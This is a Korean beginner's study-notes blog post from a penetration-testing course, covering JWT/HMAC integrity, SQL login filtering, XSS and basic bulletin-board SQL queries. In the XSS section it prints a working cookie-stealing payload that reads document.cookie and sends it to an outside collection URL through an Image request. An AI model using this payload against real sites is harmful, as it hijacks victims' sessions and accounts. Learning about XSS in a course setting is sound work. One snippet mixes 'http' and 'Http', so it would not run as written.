• Home
  • About
    • PI photo

      PI

      Beginner's Blog

    • Learn More
    • Github
  • Posts
    • All Posts
    • All Tags
    • All Categories
  • Projects

[TIL] 정리

📆 Created: 2024.11.07 Thu

Reading time ~1 minute

모의해킹 7기 4주차 - cicd

쿠키를 조작 못 하게 -> jwt 어썬ijation? jwt token hash값을 통해서 무결성 체크를 한다

암행어사의 마두패 같은 느낌

authorization

hmac

로그인 할 때 사용하는 sql 문에 종류가 다양하다 개행은 알겠는데 괄호는 뭐냐 필터링

xss

공격자가 스크립트를 삽입할 수 있는 공격 피해자의 브라우저에서 공격자가 삽입한 스크립트가 실행된다

hijack session id

let cookieData = document.cookie;

data send

const http = new XMLHttpRequest();
const url = 'https://normaltic.com/test.php';

http.open('GET', url);
Http.send();
Http.onreadystatechange = (e) => {
    console.log(Http.responseText);
};

data send: like hacker

let cookieData = document.cookie;
let attackURL = "https://normaltic.com/getCred.php?cookie=";
new Image().src = attackURL + cookieData;

%3d%3d == ==으로 끝나니까 base64일 가능성이 높겠다 <- ??? 어떤 과정을 거쳐야 이렇게 나오는 거죠???

게시판 구현 -> sql 제목, 내용, 작성자, 작성일, 조회수 게시판 글 작성: insert 게시판 글 리스트 보기: select 게시판 글 내용 읽기: select 게시판 글 수정: update 게시판 글 삭제: delete

게시판 페이징: limit (index) (count) 게시글 제목, where title like %var% = grep *var*

게시글 정렬 order by [column name] [asc/desc]



TIL Share Tweet +1
/#disqus_thread